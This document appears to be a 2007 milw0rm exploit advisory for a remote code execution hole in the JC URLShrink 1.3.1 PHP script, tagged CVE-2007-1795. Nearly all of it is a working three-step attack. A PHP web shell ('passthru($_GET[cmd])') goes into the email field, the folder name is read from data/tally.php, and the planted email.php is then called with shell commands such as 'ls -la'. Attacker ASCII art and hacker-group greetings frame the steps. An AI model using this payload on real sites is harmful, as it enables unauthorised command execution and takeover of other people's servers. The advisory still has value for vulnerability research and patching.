JC URLShrink 1.3.1 - Remote Code Execution

EKU-ID: 11581	CVE: OSVDB-34895;CVE-2007-1795	OSVDB-ID:
Author: Dj7xpl	Published: 2007-03-30	Verified:
Download:
Rating

☆☆☆☆☆
                                                          .-""""""""-.
                                                         /   Dj7xpl   \
                                                        |              |
                                                        |,  .-.  .-.  ,|
                                                        | )(_o/  \o_)( |
                                                        |/     /\     \|
                                              (@_       (_     ^^     _)
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          /
                                               (@

+_______________________________________________Iranian Are The Best In World___________________________________________+
+
+                            /*************************__I N F O__**************************\
+			     |*                                                            *|
+                            |*                     U R L S H R I N K                      *|
+                            |*                                                            *|
+                            |*  Portal:    Urlshrink                                      *|
+                            |*  Version:   1.3.1                                          *|
+			     |*  Release:   26-07-2006                                     *|
+                            |*  www:       www.developers.jccorp.net                      *|
+                            |*  Author:    Dj7xpl  | Dj7xpl@yahoo.com                     *|
+                            |*                                                            *|
+                            \**************************************************************/
+_______________________________________________________________________________________________________________________+



+________________________________________________________E X P L O I T__________________________________________________+
+
+
+                         E X P L O I T - -
+                         --------------
+
+                               1) Insert Bad Code
+
+					[X] Enter Your URL to shrink:   (Enter Random Url)  E.g : milw0m.com
+					[X] Enter your Email Address:   (Enter Bad Code)    E.g : <?php passthru($_GET[cmd]);?>
+
+
+
+			        2) See Folder Name
+
+					[X] http://[Target]/[Path]/data/tally.php
+					[X] http://localhost/urlshrink/data/tally.php       E.g : 5
+
+
+
+			        3) Visit Your Code
+
+					[X] http://localhost/urlshrink/[Folder Name]/email.php
+					    E.g : http://localhost/urlshrink/5/email.php?cmd=ls -la
+
+
+
+
+_______________________________________________________________________________________________________________________+


+___________________________________________________________T N X_______________________________________________________+
+
+
+          Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org, Simorgh .............
+
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-03-30]